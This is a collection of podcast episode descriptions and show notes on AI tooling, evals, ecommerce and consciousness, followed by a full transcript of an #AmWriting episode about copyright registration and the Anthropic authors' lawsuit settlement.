effectively(1:30:37) The time investment(1:33:38) Overview of their comprehensive evals course(1:37:57) Lightning round and final thoughts—LLM Log Open Codes Analysis Prompt:Please analyze the following CSV file. There is a metadata field which has an nested field called z_note that contains open codes for analysis of LLM logs that we are conducting. Please extract all of the different open codes. From the _note field, propose 5-6 categories that we can create axial codes from.—Referenced:• Building eval systems that improve your AI product: https://www.lennysnewsletter.com/p/building-eval-systems-that-improve• Mercor: https://mercor.com/• Brendan Foody on LinkedIn: https://www.linkedin.com/in/brendan-foody-2995ab10b• Nurture Boss: https://nurtureboss.io/• Braintrust: https://www.braintrust.dev/• Andrew Ng on X: https://x.com/andrewyng• Carrying Out Error Analysis: https://www.youtube.com/watch?v=JoAxZsdw_3w• Julius AI: https://julius.ai/• Brendan Foody on X—“evals are the new PRDs”: https://x.com/BrendanFoody/status/1939764763485171948• Who Validates the Validators? Aligning LLM-Assisted Evaluation of LLM Outputs with Human Preferences: https://dl.acm.org/doi/abs/10.1145/3654777.3676450• Lenny's post on X about evals: https://x.com/lennysan/status/1909636749103599729• Statsig: https://statsig.com/• Claude Code: https://www.anthropic.com/claude-code• Cursor: https://cursor.com/• Occam's razor: https://en.wikipedia.org/wiki/Occam%27s_razor• Frozen: https://www.imdb.com/title/tt2294629/• The Wire on HBO: https://en.wikipedia.org/wiki/The_Wire—Recommended books:• Pachinko: https://www.amazon.com/Pachinko-National-Book-Award-Finalist/dp/1455563935• Apple in China: The Capture of the World's Greatest Company: https://www.amazon.com/Apple-China-Capture-Greatest-Company/dp/1668053373/• Machine Learning: https://www.amazon.com/Machine-Learning-Tom-M-Mitchell/dp/1259096955• Artificial Intelligence: A Modern Approach: https://www.amazon.com/Artificial-Intelligence-Modern-Approach-Global/dp/1292401133/Production and marketing by https://penname.co/. For inquiries about sponsoring the podcast, email podcast@lennyrachitsky.com.—Lenny may be an investor in the companies discussed.My biggest takeaways from this conversation: To hear more, visit www.lennysnewsletter.com
How has AI changed coding with Visual Studio Code? Carl and Richard talk to James Montemagno about his experiences using the various LLM models available today with Visual Studio Code to build applications. James talks about the differences in approaches between Visual Studio and Visual Studio Code when it comes to AI tooling, and how those tools continue to evolve. The conversation also digs into how different people use AI tools to answer questions about errors, generate code, and manage projects. There's no one right way - you can experiment for yourself to get more done in less time!
Intel and Nvidia are teaming up for multiple reasons, Open AI are planning to build data centers and use a ludicrous amount of power, LLM hallucinations aren't going away, and how long we keep servers and hard drives in production. Plugs Support us on patreon and get an ad-free RSS feed with early episodes […]
Nathan Snell is a founder, executive, and three-time entrepreneur best known for co-founding nCino, the global leader in cloud banking, and now Raleon, an AI retention platform for DTC brands. With 15+ years in fintech, marketing technology, and AI, Nathan has built products that don't just scale companies, they transform entire markets, including a 10-figure exit.With Raleon, Nathan is reimagining retention for Ecommerce. Instead of bloated teams or endless manual work, Raleon acts like a teammate, helping DTC brands and agencies handle retention 50% faster while driving more revenue. From campaign planning to segmentation, it automates the tactical grind so marketers can focus on strategy and growth.Nathan's story blends technical expertise with market-shaping vision. From scaling nCino into a public company, to investing as an active angel, to now tackling one of Ecommerce's biggest pain points, retention, he's seen how AI can accelerate results but still requires human pilots to go beyond “average” output.Whether you're building a lean DTC team, rethinking retention marketing, or trying to cut through the hype of AI, Nathan offers a grounded look at how to combine automation, brand taste, and strategy to drive the next era of Ecommerce growth.In This Conversation We Discuss: [00:22] Intro[00:46] Building expertise in workflow automation[01:46] Experimenting with LLMs in workflows[03:18] Comparing AI models for DTC marketing[04:01] Starting email AI with copywriting[05:08] Fine-tuning prompts for better outputs[06:40] Elevating outputs with better context setting[08:08] Analyzing past campaigns to guide outputs[09:50] Stay updated with new episodes[10:02] Automating segmentation and copy at once[11:57] Recognizing AI delivers average by default[13:38] Editing outputs instead of chasing perfect prompts[15:20] Connecting Klaviyo and Shopify for campaigns[17:41] Automating learning cycles across campaigns[19:14] Guiding systems instead of replacing teamsResources:Subscribe to Honest Ecommerce on YoutubeAutomate DTC retention marketing with AI raleon.io/Follow Nathan Snell linkedin.com/in/nathansnellIf you're enjoying the show, we'd love it if you left Honest Ecommerce a review on Apple Podcasts. It makes a huge impact on the success of the podcast, and we love reading every one of your reviews!
How can artificial intelligence make itself more efficient? This week, Technology Now delves into the concept of solution based efficiency, how it can be applied to new and emerging technologies, and the importance of expecting the unexpected. John Frey, Senior Director and Chief Technologist of Sustainable Transformation for HPE, tells us more.This is Technology Now, a weekly show from Hewlett Packard Enterprise. Every week, hosts Michael Bird and Aubrey Lovell look at a story that's been making headlines, take a look at the technology behind it, and explain why it matters to organizations.HPE AI Sustainability Whitepaper: https://www.hpe.com/psnow/doc/a50013815enwSources:https://homepages.math.uic.edu/~leon/mcs425-s08/handouts/char_freq2.pdfhttps://www.morsecodeholistic.com/american-morse-code-translatorhttps://www.bbc.com/news/business-47460499
Intel and Nvidia are teaming up for multiple reasons, Open AI are planning to build data centers and use a ludicrous amount of power, LLM hallucinations aren't going away, and how long we keep servers and hard drives in production. Plugs Support us on patreon and get an ad-free RSS feed with early episodes... Read More
Alice for Power BI (https://alice.dev/alice-power-bi/) Mike on X (https://x.com/dominucco) Mike on BlueSky (https://bsky.app/profile/dominucco.bsky.social) Coder on X (https://x.com/coderradioshow) Show Discord (https://discord.gg/k8e7gKUpEp) Alice & Custom Dev (https://alice.dev)
In this episode, Daniel and Chris are joined by Chris Aquino, software engineer at Thunderbird to hear the story of how they developed a privacy-preserving AI executive assistant. They discuss various design decisions including remote (but confidential) inference, local encryption, and model selection. Chris A. does an amazing job describing the journey from "let the big LLM do everything" to splitting apart the workflow to be handled by multiple models. Featuring:Chris Aquino – LinkedInChris Benson – Website, LinkedIn, Bluesky, GitHub, XDaniel Whitenack – Website, GitHub, XLinks: ThunderbirdThunderbird ProSponsors:Shopify – The commerce platform trusted by millions. From idea to checkout, Shopify gives you everything you need to launch and scale your business—no matter your level of experience. Build beautiful storefronts, market with built-in AI tools, and tap into the platform powering 10% of all U.S. eCommerce.Start your one-dollar trial at shopify.com/practicalaiUpcoming Events: Join us at the Midwest AI Summit on November 13 in Indianapolis to hear world-class speakers share how they've scaled AI solutions. Don't miss the AI Engineering Lounge, where you can sit down with experts for hands-on guidance. Reserve your spot today!Register for upcoming webinars here!
The best way to cook just got better. Go to http://HelloFresh.com/THEORIESOFEVERYTHING10FM now to Get 10 Free Meals + a Free Item for Life! * One per box with active subscription. Free meals applied as discount on first box, new subscribers only, varies by plan. Get 50% off Claude Pro, including access to Claude Code, at http://claude.ai/theoriesofeverything For the first time on TOE, I sit down with professors Anil Seth and Michael Levin to test the brain-as-computer metaphor and whether algorithms can ever capture life/mind. Anil argues the “software vs. hardware” split is a blinding metaphor—consciousness may be bound to living substrate—while Michael counters that machines can tap the same platonic space biology does. We tour their radical lab work—xenobots, compositional agents, and interfaces that bind unlike parts—and probe psychophysics in strange new beings, “islands of awareness,” and what Levin's bubble-sort “side quests” imply for reading LLM outputs. Anil brings information theory and Granger causality into the mix to rethink emergence and scale—not just computation. Along the way: alignment, agency, and how to ask better scientific questions. If you're into AI/consciousness, evolution without programming, or whether silicon could ever feel—this one's for you. Timestamps: - 00:00 - Anil Seth & Michael Levin: Islands of Consciousness & Xenobots - 08:24 - Substrate Dependence: Why Biology Isn't Just 'Wetware' - 13:13 - Beyond Algorithms: Do Machines Tap Into a 'Platonic Space'? - 21:46 - The Ghost in the Algorithm: Emergent Agency in Bubble Sort - 29:26 - Degeneracy: The Biological Principle AI is Missing - 36:34 - The Multiplicity of Agency: Are Your Cells Conscious? - 43:24 - Unconscious Processing or Inaccessible Consciousness? The Split-Brain Problem - 49:32 - The Ultimate Experiment to Decode Consciousness - 57:31 - A Counter-Intuitive Discovery: Consciousness is *Less* Emergent - 1:03:39 - Psychedelics, LLMs, and the Frontiers of Surprise Learn more about your ad choices. Visit megaphone.fm/adchoices
Hey ho, welcome to the Publishing Nerd Corner, where we dive into the more technical aspects of authorship.Jess here. I love it when Sarina schools me on all things publishing nerdery, so we decided to make it official and create a whole new series. I have a long list of things I want her to explain for us, so stay tuned for more. In the meantime, our first Nerd Corner chat is a timely episode about the Anthropic case specifically and registering your copyright specifically. We're going to discuss: * The benefits of registering your copyright with the United States Copyright Office. * The possibility of a settlement in the Anthropic lawsuit, and what that could mean for authors.* Why copyright registration will be part of any potential settlement.* How to register your copyright.* Did your publisher fulfill its obligation to register your copyright?For more information about the benefits of copyright registration, see the Copyright Alliance To register your copyright yourself, you'll need Copyright.gov. You will also want to read the Authors Guild post about, “What Authors Need to Know About the Anthropic Settlement”Hit that “play” button and nerd out with us for fifteen minutes! Transcript below!EPISODE 466 - TRANSCRIPTJess LaheyHey, it's Jess Lahey. If you've been listening to the Hashtag AmWriting Podcast for any length of time, you know that, yes, I am a writer, but my true love, my deepest love, is combining writing with speaking. I get to go into schools, into community organizations, into nonprofits, into businesses, and do everything from lunch-and-learns, to community reads, to just teaching about the topics that I'm an expert in. From the topics in The Gift of Failure, engagement, learning, learning in the brain, cognitive development, getting kids motivated, and yes, the topic of over parenting and what that does to kids learning, to topics around The Addiction Inoculation, substance use prevention in kids, and what I've been doing lately that's the most fun for me, frankly, is combining the two topics. It makes the topic of substance use prevention more approachable, less scary when we're talking about it in the context of learning and motivation and self-efficacy and competence and, yes, cognitive development. So if you have any interest in bringing me into your school, to your nonprofit, to your business, I would love to come. You can go to Jessicalahey.com. Look under the menu option “Speaking” and go down to “Speaking Inquiry.” There's also a lot of information on my website about what I do. There's videos there about how I do it. Please feel free to get in touch. And I hope I get to come to your community. If you put in the speaking inquiry that you are a Hashtag AmWriting listener, we can talk about a discount. So that can be one of the bonuses for being a loyal and long-term listener to the Hashtag AmWriting Podcast. Hope to hear from you.Multiple SpeakersIs it recording? Now it's recording. Yay! Go ahead. This is the part where I stare blankly at the microphone. Try to remember what I'm supposed to be doing. All right, let's start over. Awkward pause. I'm going to rustle some papers. Okay. Now, one, two, three.Jess LaheyHey, welcome to the Hashtag AmWriting Podcast. I'm Jess Lahey, your host, along with another host today—this is going to be super fun. We are the podcast about writing: short things, long things, poetry, prose, book proposals, querying agents—we're basically the podcast about getting the work done. I am Jess Lahey. I'm the author of The Gift of Failure and The Addiction Inoculation. And you can find my journalism at The New York Times, The Washington Post, and The Atlantic.Sarina BowenAnd I'm Sarina Bowen, the author of many contemporary novels, and also a council member on The Authors Guild. And it is in that spirit that we are bringing you a special episode today, which we're calling part of our Publishing Nerd Corner segment.Jess LaheyOur favorite stuff.Sarina BowenYeah, so publishing nerd stuff. Here we go, and the topic is pretty timely.Jess LaheyAnd juicy.Sarina BowenAnd juicy. We're talking about why authors copyright their work, what it means, and how it ties into everything going on with the Anthropic lawsuit and potential settlement.Jess LaheySo, backing up, could you tell us a little bit about the Anthropic lawsuit, and sort of what it was about, and why everybody's talking about it right now?Sarina BowenOf course. So, Anthropic is an AI LLM, Large Language Model Company, just like OpenAI is the same as ChatGPT. Anthropic are the people who make Claude, but all the AI big companies are being sued right now, including Meta, including Microsoft, or...Jess LaheyGoogle. Google.Sarina BowenYeah, sorry.Jess LaheyNot Microsoft.Sarina BowenAnd also the new one is there's a new lawsuit against Apple. So, basically, everybody who went out and made a big LLM model using stolen, pirated books and articles downloaded from the Internet is being sued variously by different organizations, and it looks like the Anthropic lawsuit might be resolved first.Jess LaheyOkay, so what are they being sued for?Sarina BowenThey're being sued for a couple of things. First is the wholesale piracy of lots of books downloaded off the internet, and second, for feeding all of those books into their models to teach them how to speak and compose.Jess LaheyA while ago, weren't some—I think some—internal memos around the whole Meta thing where, essentially, they acknowledged how much it would cost to purchase legally all of the things they needed to model, do their large LLMs, and they decided, “Wow, that would be a lot of money.”Sarina BowenRight.Jess Lahey“We'll just steal them.”Sarina BowenWe don't want to deal with copyright. Well, specifically, the most interesting internal memos that we've seen have been involved in the Meta case, which we're not really talking about tonight, but yeah, there are some big smoking guns out there. But I wanted to take this opportunity to talk about the practical nature of copyrighting your work, because there's a potential settlement on the table that's taking shape in terms of how authors will be paid some portion of a $1.5 billion settlement from this Anthropic suit, potentially, and whether or not you have a registered copyright on your book is going to matter. So, first of all, in this case, the judge did rule—well, we wanted him to rule—that using these books to train the model was not a fair use situation.Jess LaheyRight. They were trying to say, “No, no, this is just fair use.”Sarina BowenRight.Jess Lahey“We shouldn't have to pay anybody.”Sarina BowenAnd unfortunately, we don't have a ruling in favor of this concept yet, and The Authors Guild cares very much that it's not fair use and will continue to fight for that. But we instead were ruled in this case something that is actually quite powerful and important to the whole conversation, which is that the judge said that Anthropic downloading all of these titles—these millions of stolen books—from a piracy site was, in fact, illegal and that they are going to have to pay. So the ruling was against them. So now this is a class-action suit, and in a class-action suit, all of the parties in the class—you can opt out if you want to, like if you're an author who would rather sue them individually, you can still do that. But it looks like in defining the class of who is eligible to receive a payout; you're going to have to have a registered copyright. Your copyright will have had to have been registered within five years of publication, and also before they downloaded it.Jess LaheySo, to clarify, some of the questions I've seen floating around on the interwebs are about, “Oh, but there was that big list that was published by The Atlantic.” You could go to The Atlantic and just see, and “oh my gosh, I had six titles that were on that list. Does that mean that I'm going to get money for all of those titles?”Sarina BowenOkay, well, that is a great question. And actually, I need to stipulate real quick that I am not a lawyer.Jess LaheyRight.Sarina BowenYou're a lawyer, and almost certainly I'm going to make an error when I'm speaking on this tonight. I have spent a lot of time listening in meetings about these things, so I feel comfortable enough to discuss it with you tonight. But, um, but I'm going to make a mistake. So you need to check everything...Jess LaheyRight.Sarina Bowen…when you make your own legal decisions. So wait, what was the question?Jess LaheySo the question was about that big list at The Atlantic.Sarina BowenOh yeah!Jess LaheyThat was like, what, 5 million titles or so?Sarina BowenWell, that list was taken from a specific piracy site.Jess LaheyRight.Sarina BowenBut it doesn't know which titles the company actually downloaded, so only the company has that list. So, first of all, that database is sort of handy and interesting, but it is not definitive in terms of this list.Jess LaheySo do not count on looking at that list and saying, “Oh, I have six titles there, maybe I'll get a payout for all six titles.”Sarina BowenRight. So, um, but let's—we really need to talk about copyright registration because there's so much misinformation floating around out there. So it's true that if you sit down right now and write something, you already own the copyright for it. So that's powerful—sort of—right? Um, but the point of registering your copyright—and these benefits are right on the Copyright Alliance website. So we're going to link to the copyright website—but, um, one of the primary reasons why people register is because registration is a necessary prerequisite for bringing, for U.S. copyright owners, to bring a copyright infringement suit in federal court. And of course, this is a federal court action, but also because statutory damages and attorneys' fees can only be sued for if you have a registered copyright. If you just own your copyright without registering it, you can sue for damages. The damages in the copyright suit are pretty hard to prove, or at least quantify. So that is why the statutory part of damages is what is being enacted in this judgment.Jess LaheyBut Sarina, I have a publisher. Didn't my publisher register my copyright for me?Sarina BowenWell, probably. My newer contracts all say the publisher must register them, and as far as I can tell, those newer contracts, the publisher did. So, yay. But I do have an old contract from about 2014 that only says that the publisher may register it. And guess what—they didn't. So, first of all, you need to see—you can go to a different database, which is the U.S. government copyright database—and look yourself up and see if your book is in there. And honestly, if your publisher was supposed to register you, and they didn't, The Authors Guild would really like to hear from you, because they're sort of looking into this. Suddenly, you know, in the last 10 days, there's a bunch of people who are like, “Oh my goodness, hang on, they didn't actually do it.” So that's something to think about, something to look at.Jess LaheyYeah.Sarina BowenMeanwhile, because statutory damages are what is going to be paid by this company, that is why the registration—it's not just to make people mad. It's not just to… it's not a gatekeeping thing. It's a legal issue with the settlement. So if you have not been in the practice of registering your copyrights, it's a pretty darn good idea to do that now. It's a completely online process. The site is quite antiquated and not that much fun to work with, and there are some moments in there when you're like, “I don't understand what's being asked of me.” But it's worth taking the time. It costs, I believe, $65 for a single title. They mail it to you at home, and then you have the certificate forever with your copyright registration number, but it's also kept in that database. You are required to deposit a copy—two copies of… well, a digital copy of your book, or two physical ones, and we usually use digital at this point. But totally worthwhile, and all the people who've been slogging it out on the copyright website up till now are probably feeling pretty good about it.Jess LaheyOkay, so there's been this settlement, and I don't know yet whether or not my book is included in that settlement because Anthropic has not turned over their list yet, but let's say I'm on it. When can I get my sweet, sweet dollars?Sarina BowenWell, right now there is a really important The Authors Guild blog post about what to do, and we will also link to that, and they, in turn, link to—I think it's the lawyer's website with a form, a contact form—saying, yes, you know, please keep me in your thoughts and send me the email so that when the list is really ready, we can find each other.Jess LaheyAnd another plug for why you should be a member of The Authors Guild, if you qualify to be a member of The Authors Guild, is that The Authors Guild made sure that their authors were included in the class action suit.Sarina BowenWell, just that they're going to hand the names.Jess LaheyYes. Exactly.Sarina BowenExcept I actually think that if you have multiple titles, if you have multiple publishers, if you use a pseudonym—there's lots of reasons to go to that lawyer's page and fill it out anyway.Jess LaheyYeah.Sarina BowenSo, I mean, the worst that can happen is that both The Authors Guild and you have turned in your name, and they'll have to sort out some duplicates. But that is not the end of the world. And I went there, and I'm filling it in as well.Jess LaheyThe Authors Guild is a great source of reliable, factual information on what is going on with this suit at the moment.Sarina BowenIt is, and it's not like… I'm very proud of my work on the council, but it's like a couple of meetings a month. But what's really happening is that the people who work at The Authors Guild—it's their job. It's a bunch of lawyers who are very good at copyright law, and they've been working on this, like, you know, without sleeping practically, for like a year and a half. So, you know, all of these suits are what they're focusing on all day long. And they want to make sure that the greatest number of authors receive the compensation that they deserve, and it's basically like their whole entire lives right now.Jess LaheyIt's always cool, actually, as a side note, in the annual meetings—I like to attend the annual meetings virtually—and it's always amazing when they give sort of a download of what's been accomplished by The Authors Guild over the past year. So it amazes me, the advocacy that's going on.Sarina BowenIt's a lot of suing people who aren't working on behalf of authors and against book bans and things like that.Jess LaheyAbsolutely, absolutely. Is there anything else that we need to know that's pressing?Sarina BowenRegister your copyrights, people, let's go.Jess LaheyGo to the show notes. The links will be in the show notes, as Sarina said. Worst case scenario, you go to that lawyer website, law firm website, and you double—you know, you've done it, and so has your publisher. But who cares, whatever, as long as you've done the work. And, in fact, I will, when I write the show notes, be going back and doing the same myself. And you know, this is a moving target. This is not over yet. This is a continuing saga.Sarina BowenRight.Jess LaheyYeah, and it's definitely not like a done deal, like, “Yay, I'm going to be getting a check in the mail next week.”Sarina BowenNo.Jess LaheyThat's not the way...Sarina BowenIt's going to take a long time, but there's going to be more of these suits. So, of course, the best time to register your copyright was five years ago. The second-best time is right now.Jess LaheySo, go do that. You have a to-do list. You have homework. Go do those things. And thank you for explaining that stuff. And thank you also for working with The Authors Guild. Because I know it's a ton of work. Not only is it a ton of work for you, doing the meetings and all that sort of stuff, but it's hard to go online and see on social media so many people misunderstanding either what this case is about, and you do a lot of clarifying, which is very sweet.Sarina BowenOh, thank you. But you know what? It's complicated.Jess LaheyIt is very complicated.Sarina BowenAnd I am not a lawyer, and I put in the time to understand it. But the truth is, it's hard. We're dealing with some really complicated concepts. IP is tricky, and, you know, I learn a little more every year, but it's hard, and if it confuses you, you are forgiven for feeling that way.Jess LaheySo, again, thank you. Go do your copyright thing. Go to the law firm website, go to The Authors Guild website, and just catch up. Catch up on what this is all about. And we will keep you posted in our little nerdy corner here, which I'm really excited about. I have a full page of questions I want to ask Sarina about some of the things that she understands really well about publishing and all of the stuff that goes into it—all these things, especially about independent publishing—that is not a world I'm a part of, but you always seem to have great answers to those questions. So we will be delivering those questions and answers to you in our Nerd Corner. And thank you so much for being with us. And until next week, keep your butt in the chair and your head in the game.NarratorThe Hashtag AmWriting Podcast is produced by Andrew Perella. Our intro music, aptly titled Unemployed Monday, was written and played by Max Cohen. Andrew and Max were paid for their time and their creative output, because everyone deserves to be paid for their work. This is a public episode. If you'd like to discuss this with other subscribers or get access to bonus episodes, visit amwriting.substack.com/subscribe